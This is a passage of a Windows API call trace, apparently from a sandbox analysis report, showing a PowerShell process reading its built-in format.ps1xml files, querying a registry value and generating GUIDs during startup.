	[0144.109] SetErrorMode (uMode=0x1) returned 0x1
	[0144.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.111] SetErrorMode (uMode=0x1) returned 0x1
	[0144.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0144.111] SetErrorMode (uMode=0x1) returned 0x1
	[0144.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0144.112] SetErrorMode (uMode=0x1) returned 0x1
	[0144.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0144.112] SetErrorMode (uMode=0x1) returned 0x1
	[0144.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.112] SetErrorMode (uMode=0x1) returned 0x1
	[0144.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0144.112] SetErrorMode (uMode=0x1) returned 0x1
	[0144.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.113] SetErrorMode (uMode=0x1) returned 0x1
	[0144.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0144.113] SetErrorMode (uMode=0x1) returned 0x1
	[0144.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0144.113] SetErrorMode (uMode=0x1) returned 0x1
	[0144.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0144.113] SetErrorMode (uMode=0x1) returned 0x1
	[0144.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0144.114] SetErrorMode (uMode=0x1) returned 0x1
	[0144.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0144.114] SetErrorMode (uMode=0x1) returned 0x1
	[0144.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0144.114] SetErrorMode (uMode=0x1) returned 0x1
	[0144.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0144.114] SetErrorMode (uMode=0x1) returned 0x1
	[0144.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0144.114] SetErrorMode (uMode=0x1) returned 0x1
	[0144.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0144.114] SetErrorMode (uMode=0x1) returned 0x1
	[0144.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0144.115] SetErrorMode (uMode=0x1) returned 0x1
	[0144.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0144.115] SetErrorMode (uMode=0x1) returned 0x1
	[0144.116] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0144.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.116] CoTaskMemFree (pv=0x1b7da8b0) 
	[0144.120] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0144.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.120] CoTaskMemFree (pv=0x1b7da8b0) 
	[0144.121] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0144.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.121] CoTaskMemFree (pv=0x1b7da8b0) 
	[0144.121] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0144.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.121] CoTaskMemFree (pv=0x1b7da8b0) 
	[0144.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.122] SetErrorMode (uMode=0x1) returned 0x1
	[0144.122] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0144.122] GetFileType (hFile=0x324) returned 0x1
	[0144.122] SetErrorMode (uMode=0x1) returned 0x1
	[0144.122] GetFileType (hFile=0x324) returned 0x1
	[0144.122] ReadFile (in: hFile=0x324, lpBuffer=0x342c9c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x342c9c8*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.124] ReadFile (in: hFile=0x324, lpBuffer=0x342c9c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x342c9c8*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.125] ReadFile (in: hFile=0x324, lpBuffer=0x342c9c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x342c9c8*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.125] ReadFile (in: hFile=0x324, lpBuffer=0x342c9c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x342c9c8*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.126] ReadFile (in: hFile=0x324, lpBuffer=0x342c9c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x342c9c8*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.126] ReadFile (in: hFile=0x324, lpBuffer=0x342c9c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x342c9c8*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.126] ReadFile (in: hFile=0x324, lpBuffer=0x342c9c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x342c9c8*, lpNumberOfBytesRead=0x1ccdf8*=0x9e2, lpOverlapped=0x0) returned 1
	[0144.126] ReadFile (in: hFile=0x324, lpBuffer=0x342bf12, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x342bf12*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0144.126] ReadFile (in: hFile=0x324, lpBuffer=0x342c9c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x342c9c8*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0144.126] CloseHandle (hObject=0x324) returned 1
	[0144.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.127] SetErrorMode (uMode=0x1) returned 0x1
	[0144.127] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccda0 | out: lpFileInformation=0x1ccda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0144.127] SetErrorMode (uMode=0x1) returned 0x1
	[0144.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.127] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cce88 | out: phkResult=0x1cce88*=0x324) returned 0x0
	[0144.127] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce0c, lpData=0x0, lpcbData=0x1cce08*=0x0 | out: lpType=0x1cce0c*=0x1, lpData=0x0, lpcbData=0x1cce08*=0x56) returned 0x0
	[0144.127] CoTaskMemAlloc (cb=0x5a) returned 0x34c670
	[0144.127] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccddc, lpData=0x34c670, lpcbData=0x1ccdd8*=0x56 | out: lpType=0x1ccddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccdd8*=0x56) returned 0x0
	[0144.127] CoTaskMemFree (pv=0x34c670) 
	[0144.127] RegCloseKey (hKey=0x324) returned 0x0
	[0144.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.137] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x104bc34b, Data2=0x4644, Data3=0x474d, Data4=([0]=0xb3, [1]=0x8f, [2]=0x61, [3]=0xb7, [4]=0xf7, [5]=0xac, [6]=0x70, [7]=0x51))) returned 0x0
	[0144.248] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x8a5afe09, Data2=0xc51f, Data3=0x4cb0, Data4=([0]=0x9c, [1]=0x87, [2]=0xce, [3]=0x1b, [4]=0xfe, [5]=0xbf, [6]=0x19, [7]=0x2e))) returned 0x0
	[0144.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0144.251] SetErrorMode (uMode=0x1) returned 0x1
	[0144.251] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0144.252] GetFileType (hFile=0x324) returned 0x1
	[0144.252] SetErrorMode (uMode=0x1) returned 0x1
	[0144.252] GetFileType (hFile=0x324) returned 0x1
	[0144.252] ReadFile (in: hFile=0x324, lpBuffer=0x3457530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3457530*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.253] ReadFile (in: hFile=0x324, lpBuffer=0x3457530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3457530*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.254] ReadFile (in: hFile=0x324, lpBuffer=0x3457530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3457530*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.254] ReadFile (in: hFile=0x324, lpBuffer=0x3457530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3457530*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.255] ReadFile (in: hFile=0x324, lpBuffer=0x3457530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3457530*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.256] ReadFile (in: hFile=0x324, lpBuffer=0x3457530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3457530*, lpNumberOfBytesRead=0x1ccdf8*=0xfb2, lpOverlapped=0x0) returned 1
	[0144.256] ReadFile (in: hFile=0x324, lpBuffer=0x3456c4a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3456c4a*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0144.256] ReadFile (in: hFile=0x324, lpBuffer=0x3457530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3457530*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0144.256] CloseHandle (hObject=0x324) returned 1
	[0144.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0144.257] SetErrorMode (uMode=0x1) returned 0x1
	[0144.257] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccda0 | out: lpFileInformation=0x1ccda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0144.257] SetErrorMode (uMode=0x1) returned 0x1
	[0144.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0144.257] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cce88 | out: phkResult=0x1cce88*=0x324) returned 0x0
	[0144.257] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce0c, lpData=0x0, lpcbData=0x1cce08*=0x0 | out: lpType=0x1cce0c*=0x1, lpData=0x0, lpcbData=0x1cce08*=0x56) returned 0x0
	[0144.258] CoTaskMemAlloc (cb=0x5a) returned 0x34c6e0
	[0144.258] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccddc, lpData=0x34c6e0, lpcbData=0x1ccdd8*=0x56 | out: lpType=0x1ccddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccdd8*=0x56) returned 0x0
	[0144.258] CoTaskMemFree (pv=0x34c6e0) 
	[0144.258] RegCloseKey (hKey=0x324) returned 0x0
	[0144.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0144.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0144.261] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x3edf7fe4, Data2=0x71b2, Data3=0x43b2, Data4=([0]=0x9e, [1]=0x4e, [2]=0x85, [3]=0xb8, [4]=0xcb, [5]=0x56, [6]=0x59, [7]=0xf2))) returned 0x0
	[0144.266] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x7243cc96, Data2=0x3f2b, Data3=0x421f, Data4=([0]=0xa2, [1]=0x30, [2]=0x7c, [3]=0xec, [4]=0x93, [5]=0x64, [6]=0xb1, [7]=0x66))) returned 0x0
	[0144.268] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xeff16bf5, Data2=0xff32, Data3=0x4fc4, Data4=([0]=0xbc, [1]=0xbf, [2]=0x3e, [3]=0xc4, [4]=0xcb, [5]=0x59, [6]=0xcb, [7]=0xf3))) returned 0x0
	[0144.269] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x8e9fbce8, Data2=0x9155, Data3=0x4db9, Data4=([0]=0xba, [1]=0xed, [2]=0xea, [3]=0x0, [4]=0x1c, [5]=0xaf, [6]=0xf8, [7]=0xd5))) returned 0x0
	[0144.271] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x20aa45a3, Data2=0xacc9, Data3=0x49f7, Data4=([0]=0xb2, [1]=0x9b, [2]=0xcf, [3]=0x73, [4]=0x70, [5]=0x1d, [6]=0x54, [7]=0x5d))) returned 0x0
	[0144.271] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x6041e5bf, Data2=0x1deb, Data3=0x4fd6, Data4=([0]=0x8a, [1]=0x6c, [2]=0x5d, [3]=0x68, [4]=0x90, [5]=0x2a, [6]=0x4d, [7]=0x54))) returned 0x0
	[0144.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0144.273] SetErrorMode (uMode=0x1) returned 0x1
	[0144.273] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0144.273] GetFileType (hFile=0x324) returned 0x1
	[0144.273] SetErrorMode (uMode=0x1) returned 0x1
	[0144.273] GetFileType (hFile=0x324) returned 0x1
